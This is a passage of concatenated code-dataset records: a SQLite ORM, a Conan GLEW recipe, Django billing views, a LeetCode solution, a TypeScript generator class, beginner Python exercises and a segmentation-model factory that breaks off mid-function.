\n self.values['pk'] = pk # ^ It is only set if you issued a INSERT statement using the execute() method.\n\n\n def update_row(self):#<-- when we call this function, we have already changed the class (Account/Trade/Position).values[field] and want to save it to db\n \"\"\"update the row with this instance's pk value to the current\n values of this instance\"\"\"\n with sqlite3.connect(self.dbpath) as conn:\n curs = conn.cursor()\n # join a list of \"column_name = ?\" pairs\n set_equals = \", \".join([\"{}=?\".format(field) for field in self.fields]) #<-- same as in insert_row but condensed\n SQL = \"\"\" UPDATE {} SET {} WHERE pk=?; \"\"\".format(self.tablename,set_equals)\n values = [self.values[field] for field in self.fields] + [self.values['pk']]\n curs.execute(SQL, values)\n\n def delete(self):\n if self.values['pk'] is None:\n raise KeyError(self.__repr__() + \" is not a row in \" +\n self.tablename)\n with sqlite3.connect(self.dbpath) as conn:\n curs = conn.cursor()\n SQL = \"\"\"DELETE FROM {} WHERE pk = ?; \"\"\".format(self.tablename)\n curs.execute(SQL, (self.values['pk'],))\n\n @classmethod\n def create_table(cls):\n \"\"\"run the cls.createsql SQL command\"\"\"\n with sqlite3.connect(cls.dbpath) as conn:\n curs = conn.cursor()\n curs.execute(cls.createsql)\n\n @classmethod\n def one_from_where_clause(cls, where_clause=\"\", values=tuple()):\n SQL = \"SELECT * FROM {} {};\".format(cls.tablename, where_clause)\n with sqlite3.connect(cls.dbpath) as conn:\n conn.row_factory = sqlite3.Row\n cur = conn.cursor()\n cur.execute(SQL, values)\n row = cur.fetchone()\n if not row:\n return None\n return cls(**row)\n\n @classmethod\n def all_from_where_clause(cls, where_clause=\"\", values=tuple()):\n SQL = \"SELECT * FROM {} {};\".format(cls.tablename, where_clause)\n with sqlite3.connect(cls.dbpath) as conn:\n conn.row_factory = sqlite3.Row\n cur = conn.cursor()\n cur.execute(SQL, values)\n rows = cur.fetchall()\n return [cls(**row) for row in rows]\n\n @classmethod\n def one_from_pk(cls, pk):\n return cls.one_from_where_clause(\"WHERE pk=?\", (pk,))\n","sub_path":"TTrader/model/orm.py","file_name":"orm.py","file_ext":"py","file_size_in_byte":5057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"415799279","text":"#!/usr/bin/python\n\nfrom math import log,sqrt\n\ndef mean(X):\n\treturn sum(X)*1.0/len(X)\n\ndef getCor( A, B ):\n\tmA, mB = mean(A), mean(B)\n\tup = sum([(a-mA)*(b-mB) for a,b in zip(A,B)])\n\tdn = sum([(a-mA)**2 for a in A]) * sum([(b-mB)**2 for b in B])\n\treturn 0 if dn == 0 else up / sqrt(dn)\n\nimport sys, numpy\n\nwith open(sys.argv[1],'r') as inp:\n\tdata = [map(float,row.strip().split()) for row in inp]\n\n\ncor = [getCor(data[i],data[j]) for i in xrange(len(data)) for j in xrange(i+1,len(data))]\n\nwith open(sys.argv[2],'w') as oup:\n\tF, P = numpy.histogram(cor, 100)\n\tfor f, p in zip(F,P):\n\t\tprint >> oup, str(p) + '\\t' + str(f)\n","sub_path":"other-method/cor.py","file_name":"cor.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"510323619","text":"from conans import python_requires, tools, CMake\npyreq = python_requires(\"pyreq/1.0.0@tdelame/stable\")\n\n\nclass GLEW(pyreq.CMakeConanFile):\n description = \"OpenGL Extension Wrangler Library\"\n url = \"https://glew.sourceforge.net/\"\n version = \"2.1.0\"\n name = \"GLEW\"\n license = \"MIT\"\n\n settings = \"os\", \"build_type\"\n\n def config_options(self):\n 
\"\"\"Executed before the actual assignment of options. Use it to configure or constrain\n the available options in a package. You can read values of self.settings but you cannot\n read values of self.options.\"\"\"\n if self.settings.os != \"Linux\":\n raise RuntimeError(\"Your OS has not been tested for this recipe. Please, extend the recipe.\")\n\n def requirements(self):\n \"\"\"Define runtime requirements.\"\"\"\n self.requires(\"GLU/9.0.0@tdelame/stable\")\n\n def source(self):\n \"\"\"Retrieve source code.\"\"\"\n self.download(\n \"https://github.com/nigels-com/glew/releases/download/glew-{0}\".format(self.version),\n directory=\"glew-{}\".format(self.version), compression=\"tgz\")\n\n def cmake_definitions(self):\n definition_dict = {\n \"BUILD_UTILS\": False,\n \"GLEW_REGAL\": False,\n \"GLEW_OSMESA\": False,\n }\n self.add_default_definitions(definition_dict)\n return definition_dict\n\n def configure_cmake(self):\n \"\"\"Configure and return a CMake build helper.\"\"\"\n cmake = CMake(self, generator=\"Ninja\")\n cmake.configure(\n defs=self.cmake_definitions(),\n source_folder=\"{}/build/cmake\".format(self._source_subfolder),\n build_folder=self._build_subfolder)\n return cmake\n\n def package(self):\n \"\"\"Assemble the package.\"\"\"\n self.copy(\"include/*\", \".\", \"%s\" % self._source_subfolder, keep_path=True)\n self.copy(\"%s/license*\" % self._source_subfolder, dst=\"licenses\", ignore_case=True, keep_path=False)\n self.copy(pattern=\"LICENSE\", dst=\"licenses\", src=self._source_subfolder)\n\n if self.options.shared:\n self.copy(pattern=\"*.so\", dst=\"lib\", keep_path=False)\n self.copy(pattern=\"*.so.*\", dst=\"lib\", keep_path=False)\n else:\n self.copy(pattern=\"*.a\", dst=\"lib\", keep_path=False)\n\n def package_info(self):\n super(GLEW, self).package_info()\n self.cpp_info.libs = ['GLEW']\n self.cpp_info.libs.append(\"GL\")\n if self.settings.build_type == \"Debug\":\n self.cpp_info.libs[0] += \"d\"\n","sub_path":"GLEW/GLEW-2.1.0.py","file_name":"GLEW-2.1.0.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"196434442","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom member.models import Member, Bill, Lot, BillCtl, History\nfrom django.db.models import Count\nfrom .forms import MemberForm, BillForm\nfrom django.core.files.storage import FileSystemStorage\nfrom django.template.loader import render_to_string\nfrom django.utils._os import safe_join\nfrom reportlab.pdfgen import canvas\nfrom decimal import *\nfrom member import report\nfrom member.printing import MyPrint\nfrom io import BytesIO\n\nimport pdb, weasyprint\n\nresFee = 50\n\ndef member_search(request):\n return render(request, 'member_search.html')\n\ndef member_detail(request, pk):\n members = get_object_or_404(Member, pk=pk)\n # members = Member.objects.all()\n return render(request, 'member_detail.html', {'members': members})\n\ndef lot_list(request):\n lotc = Lot.objects.annotate(num_lots=Count('mem'))\n return render(request, 'member_list.html', {'jack': lotc})\n\ndef search(request):\n if 'q' in request.GET and request.GET['q']:\n q = request.GET['q']\n members = Member.objects.filter(last__icontains= q)\n return render(request, 'search_results.html', {'members': members, 'query': q})\n else:\n message = 'Please submit a search term.'\n return HttpResponse(message)\n# -------------------------------------------New 
Member\ndef member_new(request):\n if request.method == \"POST\":\n form = MemberForm(request.POST)\n if form.is_valid():\n post = form.save()\n post.save()\n\n else:\n form = MemberForm()\n return render(request, 'post_edit.html', {'form' : form})\n\n\ndef member_bill(request, pk):\n bdetail = get_object_or_404(Member, pk=pk)\n glot = Lot.objects.filter(mem = str(pk))\n gbal = History.objects.filter(mid = str(pk)).filter(year__icontains=2015)\n return render(request, 'bill_detail.html', {'bdetail': bdetail, 'glot': glot, 'gbal': gbal})\n\n\n\n#-----------------------------------------------------------------Member Billing\n\n\n\n\n\ndef checkBillrec(dt, xbdet, xbctl):\n billrec = Bill.objects.filter(mem__exact=xbdet.id).filter(bill_year__exact=dt)\n for xbill in billrec:\n# pdb.set_trace()\n if xbill.bill_flag == 'N':\n billr = Bill.objects.get(id=xbill.id)\n billr.bill_flag = 'R'\n billr.save()\n if xbill.bill_flag == \"Y\":\n return\n gbal = History.objects.filter(mid=xbdet.id).filter(year__exact=(dt - 1))\n pastbal = 0\n for xgbal in gbal:\n pastbal = xgbal.bal\n if 'R' in xbdet.flag:\n res_wk = xbctl.res_fee\n else:\n res_wk = 0\n glot = Lot.objects.filter(mem__exact=xbdet.id)\n len_glot = 0\n ctxyz = 0\n for xyz in glot:\n len_glot = len_glot + 1\n if xyz.mow == 'Y':\n ctxyz = ctxyz + 1\n tot_bill = (pastbal + xbctl.dues + res_wk + (len_glot * xbctl.lot_maint) +\n (ctxyz * xbctl.mow_fee) + round((pastbal * xbctl.pdue_percent),0))\n rwrt = Bill(mem=xbdet.id, bill_year = dt, bill_date = xbctl.billdate, dues_amt = xbctl.dues,\n bal_amt = pastbal, pdue_amt = round((pastbal * xbctl.pdue_percent),0), res_amt = res_wk,\n lots_amt = (len_glot * xbctl.lot_maint), mow_amt = (ctxyz * xbctl.mow_fee),\n tot_amt = tot_bill, lots = len_glot, mow = ctxyz, bill_flag = 'Y', print_flag = 'N')\n rwrt.save()\n return\n\ndef memberBilling(dt, xbctl):\n bdetail = Member.objects.all()\n for xbdet in bdetail:\n if \"A\" in xbdet.flag:\n checkBillrec(dt, xbdet, xbctl)\n return\n\n\ndef checkBillCtl(request, dte):\n dt = int(dte)\n try:\n bctl = BillCtl.objects.filter(year__exact=dt)\n except:\n return HttpResponseNotFound('
Bill Control Record Not Found
')\n for xbctl in bctl:\n memberBilling(dt, xbctl)\n return HttpResponse(\"Billing Complete\")\n\ndef memberBillCtl(request, dte):\n try:\n form = BillCtl.objects.filter(year__exact=dte)\n\n except:\n\n if request.method == \"POST\":\n form = BillForm(request.POST)\n if form.is_valid():\n post = form.save()\n post.save()\n\n else:\n form = BillForm()\n\n return render(request, 'post_edit.html', {'form' : form})\n\n\n# -----------------------------------------------------------------------Print Member Bills\n\n\ndef printBillCtl(request, dte):\n dt = int(dte)\n try:\n bctl = BillCtl.objects.filter(year__exact=dt)\n except:\n return HttpResponseNotFound('
Bill Control Record Not Found
')\n for xctl in bctl:\n invdatestr = str(xctl.billdate)\n invdate = invdatestr[5:7] + '/' + invdatestr[8:10] + '/' + invdatestr[0:4]\n duedatestr = str(xctl.billduedate)\n duedate = duedatestr[5:7] + '/' + duedatestr[8:10] + '/' + duedatestr[0:4]\n\n\n colBill = []\n try:\n pbill = Bill.objects.filter(bill_year__exact=xctl.year).filter(bill_flag__exact='Y').filter(print_flag__exact='N')\n except:\n return HttpResponse('Nothing to Print')\n for xz in pbill:\n x_colBill = []\n try:\n membill = Member.objects.get(id=xz.mem)\n\n x_colBill.append(str(xz.id))\n x_colBill.append(str(xz.mem))\n\n x_colBill.append(membill.set_memberfullName())\n x_colBill.append(membill.other)\n x_colBill.append(membill.street)\n x_colBill.append(membill.set_memberCitySt())\n\n except:\n return HttpResponse('Missing member for Bill record #')\n memlots = Lot.objects.filter(mem__exact = xz.mem)\n first = True\n xlot = ''\n for xy in memlots:\n if first == False:\n xlot = xlot + (', ')\n else:\n first = False\n xlot = xlot + xy.lid\n x_colBill.append(xlot)\n x_colBill.append(xz.dues_amt)\n x_colBill.append(xz.bal_amt)\n x_colBill.append(xz.res_amt)\n x_colBill.append(xz.lots_amt)\n x_colBill.append(xz.mow_amt)\n x_colBill.append(xz.pdue_amt)\n x_colBill.append(xz.tot_amt)\n x_colBill.append(xz.lots)\n x_colBill.append(xz.mow)\n x_colBill.append(xz.dues_amt + xz.res_amt + xz.lots_amt + xz.mow_amt)\n colBill.append(x_colBill)\n # return render(request, 'print_bill.html', {'colBill': colBill, 'invdate': invdate, 'duedate': duedate})\n # html_string = render_to_string('print_bill.html', {'colBill': colBill, 'invdate': invdate})\n html_string = render_to_string('print_bill.html', {'colBill': colBill, 'invdate': invdate, 'duedate': duedate})\n # return render(request, 'print_bill.html', {'colBill': colBill, 'invdate': invdate})\n\n html = weasyprint.HTML(string=html_string, base_url=request.build_absolute_uri())\n\n html.write_pdf(target='/tmp/mypdf.pdf');\n\n fs = FileSystemStorage('/tmp')\n with fs.open('mypdf.pdf') as pdf:\n response = HttpResponse(pdf, content_type='application/pdf')\n response['Content-Disposition'] = 'attachment; filename=\"mypdf.pdf\"'\n return response\n return response\n pdb.set_trace()\n response = HttpResponse(content_type='application/pdf')\n response['Content-Disposition'] = 'attachment; filename=\"Bills.pdf\"'\n\n buffer = BytesIO()\n\n report = MyPrint(buffer, 'Letter')\n pdf = report.callprt_bills(pbill)\n\n response.write(pbill)\n\n return HttpResponse(\"Billing Complete\")\n\ndef my_fetcher(url):\n pdb.set_trace()\n if url.startswith('/static/'):\n url = url[len('/static/'):]\n url = \"file://\" + '/home/tracy/sund2/member/static/Letterhead2.jpg'\n pdb.set_trace()\n return weasyprint.default_url_fetcher(url)\n\n\ndef html_to_pdf_view(request, year, month, day):\n\n members = Member.objects.all()\n\n\n html_string = render_to_string('print_bill.html', {'colBill': colBill, 'invdate': invdate})\n return render(request,'print_bill.html', {'members': members})\n\n html = weasyprint.HTML(string=html_string, base_url=request.build_absolute_uri())\n\n html.write_pdf(target='/tmp/mypdf.pdf');\n\n fs = FileSystemStorage('/tmp')\n with fs.open('mypdf.pdf') as pdf:\n response = HttpResponse(pdf, content_type='application/pdf')\n response['Content-Disposition'] = 'attachment; filename=\"mypdf.pdf\"'\n return response\n return response\n\n\ndef print_users(request):\n\n\n # Create the HttpResponse object with the appropriate PDF headers.\n response = HttpResponse(content_type='application/pdf')\n 
response['Content-Disposition'] = 'attachment; filename=\"My Users.pdf\"'\n\n buffer = BytesIO()\n\n report = MyPrint(buffer, 'Letter')\n\n pdf = report.print_users()\n\n response.write(pdf)\n return response\n","sub_path":"member/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"331196096","text":"class Solution:\n def search(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: bool\n \"\"\"\n\n lo = 0\n hi = len(nums) - 1\n while lo <= hi:\n mid = int(lo + hi) // 2\n if nums[mid] == target:\n return True\n # If we know for sure right side is sorted or left side is unsorted\n if nums[mid] < nums[hi] or nums[mid] < nums[lo]:\n if nums[mid] < target <= nums[hi]:\n lo = mid +1\n else:\n hi = mid -1\n # If we know for sure right side is sorted or left side is unsorted\n elif nums[mid] > nums[lo] or nums[mid] > nums[hi]:\n if target < nums[mid] and target >= nums[lo]:\n hi = mid - 1\n else:\n lo = mid +1\n else:\n hi -=1\n return False\n\nif __name__==\"__main__\":\n sol = Solution()\n print(sol.search([1,2,1], 0))\n print(sol.search([2, 5, 6, 0, 0, 1, 2], 0))\n print(sol.search([2, 5, 6, 0, 0, 1, 2], 3))\n","sub_path":"lc_1-100/lc_81.py","file_name":"lc_81.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"287997320","text":"# -----------------------------------------------------------------------------\n# Copyright (c) 2019, Minor Gordon\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in\n# the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND\n# CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT\n# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY\n# OF SUCH DAMAGE.\n# -----------------------------------------------------------------------------\n\nimport os.path\n\nfrom thryft.generator.document import Document\nfrom thryft.generators.ts._ts_named_construct import _TsNamedConstruct\nfrom thryft.util import decamelize\n\n\nclass TsDocument(Document, _TsNamedConstruct):\n def _save_to_dir(self, out_dir_path, **kwds):\n self._parent_generator().ts_out_dir_path = out_dir_path\n return self._save_to_file(out_file_path=self.ts_path(), **kwds)\n\n def _save_to_file(self, out_file_path, **kwds):\n if self._parent_generator().ts_out_dir_path is None:\n self._parent_generator().ts_out_dir_path = os.path.dirname(out_file_path)\n self.__ts_path = out_file_path\n assert out_file_path == self.ts_path(), \"%s vs. %s\" % (\n out_file_path, self.ts_path())\n return self._save_to_file_helper(repr_method=self.ts_repr, out_file_path=out_file_path, **kwds)\n\n def ts_path(self, file_name=None):\n try:\n return self.__ts_path\n except AttributeError:\n pass\n\n if file_name is None:\n if len(self.definitions) > 0:\n file_name = decamelize(self.definitions[0].ts_name())\n else:\n file_name = self.name\n ts_out_dir_path = self._parent_generator().ts_out_dir_path\n assert ts_out_dir_path is not None\n ts_path = \\\n os.path.join(\n ts_out_dir_path,\n self.namespace_by_scope(\n ('ts', '*')).name.replace('.', os.path.sep),\n file_name + '.ts'\n )\n return ts_path\n\n def _ts_imports_definition(self, **kwds):\n imports = []\n for definition in self.definitions:\n imports.extend(definition.ts_imports_definition(**kwds))\n return imports\n\n def ts_repr(self):\n definitions = \\\n \"\\n\\n\".join(definition.ts_repr()\n for definition in self.definitions)\n if len(definitions) == 0:\n return ''\n\n sections = []\n imports = \"\\n\".join(\n sorted(list(set(self.ts_imports_definition(self.ts_path())))))\n if len(imports) > 0:\n sections.append(imports)\n sections.append(definitions)\n return \"\\n\\n\".join(sections) + \"\\n\"\n","sub_path":"compiler/src/thryft/generators/ts/ts_document.py","file_name":"ts_document.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"425098208","text":"# 打印一个边长为n的正方形\nn = 5\nprint('*'*n)\nfor i in ('*'*(n-2)):\n print('*'+' '*(n-2)+'*')\nprint('*'*n)\n\nn = 6\ne = -n//2\nfor i in range(e,n+e):\n if i == e or i == n+e-1:\n print('*'*n)\n else:\n print('*'+' '*(n-2)+'*')\n\nn = 5\nfor i in range(5):\n if i == 0 or i == n-1:\n print('*'*n)\n else:\n print('*'+' '*(n-2)+'*')\n\n# 求100以内所有奇数之和\nsum = 0\nfor i in range(1,100,2):\n sum += i\nprint(sum)\n\n# 求1到5的阶乘之和\nn = 5\nsum = 0\nfor i in range(1,n+1):\n tmp = 1\n for j in range(1,i+1):\n tmp *= j\n sum += tmp\nprint(sum)\n\nnums = 1\nsum = 0\nfor n in range(1,6):\n nums *= n\n sum += nums\nprint(sum)\n\n# 给一个半径,求圆的面积和周长。圆周率3.14\nr = int(input('r='))\nprint('area='+str(3.14*r*r))\nprint('circumference='+str(2*3.14*r))\n\n# 输入两个数,比较大小后,从小到大升序打印\na = input('first:')\nb = 
input('second:')\nif int(a) > int(b):\n    print(b,a)\nelse:\n    print(a,b)\n\nprint(b,a) if int(a)>int(b) else print(a,b)\n# ternary expression\n\n# get the maximum value\nm = int(input('Input first number >>>'))\nwhile True:\n    c = input('Input a number >>>')\n    if c:\n        n = int(c)\n        if n > m:\n            m = n\n        print('Max is',m)\n    else:\n        break\n\n# read n numbers and print the running arithmetic mean after each input\nn = 0\nsum = 0\nwhile True:\n    i = input('>>>')\n    if i == 'quit':\n        break\n    n += 1\n    sum += int(i)\n    avg = sum/n\n    print(avg)\n\n# 9x9 multiplication table\nfor i in range(1,10):\n    for j in range(1,10):\n        if j <= i:\n            print('{}*{}={}'.format(i,j,i*j),end=' ')\n    print(\" \")\n\nfor i in range(1,10):\n    for j in range(i,10):\n        print('{}*{}={}\\t'.format(i,j,i*j),end=' ')\n    print(\"\")\n\nfor i in range(1,10):\n    for k in range(1,i):\n        print(end=\"\\t \")\n    for j in range(i,10):\n        print('{}*{}={}\\t'.format(i,j,i*j),end=' ')\n    print(\" \")\n\nfor i in range(1,10):\n    for k in range(1,10-i):\n        print(end=\"\\t \")\n    for j in range(1,i+1):\n        print(\"{}*{}={}\".format(j,i,i*j),end=\"\\t \") \n    # putting \\t inside end=\"\" seems easier to understand\n#        print(\"{}*{}={}\\t\".format(i,j,i*j),end=\" \")\n    print(\"\")\n\n# print the Fibonacci sequence up to 100, then the 101st term\n# The Fibonacci sequence starts with 0 and 1; every later term is the sum of the two terms before it. The first few terms are:\n# 0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233... (sequence A000045 in the OEIS)\n# Note in particular: 0 is not the first term but the zeroth term.\na = 0\nb = 1\nprint(a,end=\",\")\nprint(b,end=\",\")\nfor i in range(1,100):\n    c = a + b\n    if c > 100:\n        break\n    print(c,end=\",\")\n#    a = b\n#    b = c\n    a,b = b,c\n    # this one line is equivalent to the two statements a = b and b = c\n\n# print 101 terms of the Fibonacci sequence\na = 0\nb = 1\n# print the first two terms by hand\nprint('{},{}'.format(0, a))\nprint('{},{}'.format(1, b))\nindex = 1\nwhile True:\n    c = a + b\n    a = b\n    b = c\n    index += 1\n    print('{},{}'.format(index, c))\n    # index is the ordinal shown at the front of each output line\n    if index == 101:\n        break\n\n# print only the 101st Fibonacci term\na = 0\nb = 1\n# print('{},{}'.format(0,a))\n# print('{},{}'.format(1,b))\nindex = 1\nwhile True:\n    c = a + b\n    a,b = b,c\n    index += 1\n    if index == 101:\n        print('{},{}'.format(index,c))\n        break\n\na = 0\nb = 1\nfor i in range(1,101):\n    c = a + b\n    a,b = b,c\n    if i < 100:\n        continue\n    print(c)\n\n# primality test\nn = int(input(\"Please input a prime number >>>\"))\nflag = False\nfor i in range(2,n):\n    if n % i == 0:\n        flag = True\n        print(i)\n        break\nif flag:\n    print(n,'is not a prime number.')\nelse:\n    print(n,'is a prime number.')\n\nn = int(input(\"Please input a prime number >>>\"))\n# the upper bound must be int(n**0.5)+1; without the +1, squares such as 9 were reported as prime\nfor i in range(2,int(n**0.5)+1):\n    if n % i == 0:\n        print(n,'is not a prime number.')\n        break\nelse:\n    print(n,'is a prime number.')\n\n# find all primes below 100,000\n# A prime number is a natural number greater than 1 that is not evenly divisible by any natural number other than 1 and itself (equivalently, a number with exactly two positive divisors, 1 and itself).\n# A natural number greater than 1 that is not prime is called a composite number.\n# The fundamental theorem of arithmetic gives primes their central place in number theory: every integer greater than 1 can be written as a product of primes in exactly one way.\n# To keep that factorization unique, 1 is defined as not prime, since a factorization could otherwise contain any number of 1s (e.g. 3, 1×3 and 1×1×3 would all be valid factorizations of 3).\nimport time\nt = [2] # primes start from 2\nt0 = time.time()\ncount = 1\nfor x in range(3,100001,2):\n    if x > 5 and x % 10 == 5:\n        continue\n    for i in range(3, int(x ** 0.5) + 1, 2):\n        if x % i == 0:\n            break\n    else:\n        count += 1\n        t.append(x)\nprint(t)\nprint('elapsed time: {}'.format(time.time() - t0))\nprint('number of primes: {}'.format(count))\nprint('number of primes: {}'.format(len(t)))\n\n# print a diamond\nfor i in range(-3,4):\n    if i < 0:\n        prespace = -i\n    else:\n        prespace = i\n    print(' '*prespace + '*'*(7-prespace*2))\n\nfor i in range(-3,4):\n    prespace=-i if i<0 else i\n    # ternary-operator version; it cannot be written as prespace=-i if (i < 0) else prespace=i, which raises a syntax error\n    print(' '*prespace+'*'*(7-prespace*2)) \n\n# print two triangles tip to tip (an hourglass)\nn = 7\ne = n//2\nfor i in range(-e,n-e):\n    prespace = -i if i<0 else i\n    print(' '*(e-prespace)+'*'*(2*prespace+1))\n\n# print a lightning bolt\nfor i in range(-3,4):\n    if i < 0:\n        print(' '*(-i)+'*'*(4+i))\n    elif i > 0:\n        print(' '*3+'*'*(4-i))\n    else:\n        print('*'*7)\n\nj = '*'\nfor i in range(-3,4):\n    if i == 0:\n        print(j*7)\n    print(' '*(-i)+j*(i+4)) if i < 0 else print(3*\" \"+j*(3-i))\n\n# A monkey picks some peaches on day 1: it immediately eats half of them, and then one more. The next morning it eats half of the remaining peaches, and again one more. Every following morning it eats half of what was left the day before plus one. On the morning of day 10 it wants to eat and finds only one peach left. How many peaches were picked on day 1?\n# (After finishing on day 9 the monkey should already know that only one peach is left.)\nn = 1\nfor _ in range(1,10):\n    n = (n+1)*2\n    print(n)\n\n# variation: if the total number of peaches is known, work out the amount eaten day by day\nn = int(input(\">>>\"))\ncount = 0\nwhile True:\n    n = n/2-1\n    if n <= 1:\n        break\n    print(n)\n    count +=1\nprint('count:',count)\n\n\n# Yang Hui's (Pascal's) triangle\n# Method 1.\n# Idea: first put the first two rows of the triangle into the big list, then loop from the third element on. Start\n# each new row with a leading 1, i.e. cur = [1], then add the middle part; pre is the row before the one being computed,\n# i.e. the corresponding small list inside the triangle list, and the for j loop adds the middle part. Finally append the\n# trailing 1; that completes one row, which is appended to the whole list - and the whole list is the triangle\ntriangle=[[1],[1,1]]\nfor i in range(2,6):\n    cur = [1]\n    pre = triangle[i-1]\n    for j in range(len(pre)-1):\n        cur.append(pre[j]+pre[j+1])\n    cur.append(1)\n    triangle.append(cur)\nprint(triangle)\n\n# First define an empty triangle list, then loop and append each computed row list to the big list. Note that\n# after row has been appended to triangle, data can still be appended to that same row list.\ntriangle=[]\nn = 4\nfor i in range(n):\n    row = [1]\n    triangle.append(row)\n    if i == 0: # when i is 0 the loop restarts from here\n        continue\n    for j in range(i-1): # this is only entered once i is 2\n        row.append(triangle[i-1][j]+triangle[i-1][j+1])\n    row.append(1) # when i is 1 execution jumps straight here and appends 1, without running the loop above\nprint(triangle)\n\n# Method 2, while\n# Idea: present the triangle as a series of small lists, printing each list on its own line. Print the first\n# row [1], then from the second row on first copy the previous row into oldline (e.g. when computing the second row,\n# copy the [1] in newline into oldline), clear newline, and compute the rest, controlled by offset and i.\nn = 6\noldline = []\nnewline = [1]\n# length = 0\nprint(newline)\nfor i in range(1,n):\n    oldline = newline.copy()\n    oldline.append(0)\n    newline.clear()\n    offset = 0\n    while offset <= i:\n        newline.append(oldline[offset - 1]+oldline[offset])\n        offset += 1\n    print(newline)\n\nn = 6\noldline = []\nnewline = [1]\nprint(newline)\nfor i in range(1,n):\n    oldline = newline.copy()\n    oldline.append(0)\n    newline.clear()\n    offset = 0\n    for j in range(i+1):\n        newline.append(oldline[j-1]+oldline[j])\n    print(newline)\n\ntriangle = []\nn = 6\nfor i in range(n):\n    row = [1]\n    for k in range(i):\n        row.append(1) if k == i-1 else row.append(0)\n    triangle.append(row)\n    if i == 0:\n        continue\n    for j in range(1,i//2+1):\n        val = triangle[i-1][j-1] + triangle[i-1][j]\n        row[j] = val\n        if i != 2*j:\n            row[-j-1] = val\nprint(triangle)\n\ntriangle = []\nn = 6\nfor i in range(n):\n    row = [1] * (i+1) # when i is 2 this is [1,1,1]\n    triangle.append(row) # append [1,1,1] to the triangle list\n    for j in range(1,i//2+1): # when i is 2, j can only be 1\n        val = triangle[i-1][j-1] + triangle[i-1][j] \n        # for i == 2 this is triangle[1][0] + triangle[1][1], i.e. the two 1s of [1,1] added together give val, and row[1] is updated,\n        # so the middle 1 of [1,1,1] becomes 2\n        # when i is 3 this still loops exactly once: row is [1,1,1,1] and j is 1\n        row[j] = val\n        if i != 2*j:\n            row[-j-1] = val\nprint(triangle)\n","sub_path":"20191022Python基础练习.py","file_name":"20191022Python基础练习.py","file_ext":"py","file_size_in_byte":9593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"315317068","text":"# -*- coding: utf-8 -*-\n\"\"\"\nModule that acts as a factory to create segmentation models with a common\ninterface, regardless of the underlying implementation.\n\nMany models are supported by using the segmentation model zoo:\nhttps://github.com/qubvel/segmentation_models\n\n\n@author: Pieter Roggemans\n\"\"\"\n\nimport logging\nimport keras as kr\n\n#-------------------------------------------------------------\n# First define/init some general variables/constants\n#-------------------------------------------------------------\n# Get a logger...\nlogger = 
logging.getLogger(__name__)\n#logger.setLevel(logging.INFO)\n\n#-------------------------------------------------------------\n# The real work\n#-------------------------------------------------------------\n\n'''\npreprocessing_fn = get_preprocessing('resnet34')\nx = preprocessing_fn(x)\n'''\n\ndef get_model(segmentation_model: str = 'linknet',\n              backbone_name: str = 'inceptionresnetv2',\n              input_width: int = None,\n              input_height: int = None,\n              n_channels: int = 3,\n              n_classes: int = 1,\n              init_weights_with: str = 'imagenet'):\n\n    if segmentation_model.lower() == 'deeplabv3plus':\n        import model_deeplabv3plus as m\n        return m.get_model(input_width=input_width, input_height=input_height,\n                           n_channels=n_channels, n_classes=n_classes,\n                           init_model_weights=init_weights_with)\n    elif segmentation_model.lower() == 'unet':\n        # These two unet variants are implemented in a separate module\n        if backbone_name.lower() == 'standard':\n            import model_unet_standard as m\n            # bool() keeps init_weights defined even when init_weights_with is None/empty\n            init_weights = bool(init_weights_with)\n            return m.get_model(input_width=input_width, input_height=input_height,\n                               n_channels=n_channels, n_classes=n_classes,\n                               init_model_weights=init_weights)\n        elif backbone_name.lower() == 'ternaus':\n            import model_unet_ternaus as m\n            # bool() keeps init_weights defined even when init_weights_with is None/empty\n            init_weights = bool(init_weights_with)\n            return m.get_model(input_width=input_width, input_height=input_height,\n                               n_channels=n_channels, n_classes=n_classes,\n                               init_model_weights=init_weights)\n\n        # Other unet variants are implemented using the segmentation_models library\n        from segmentation_models import Unet\n        #from segmentation_models.backbones import get_preprocessing\n\n        model = Unet(backbone_name=backbone_name,\n                     input_shape=(input_width, input_height, n_channels),\n                     classes=n_classes,\n                     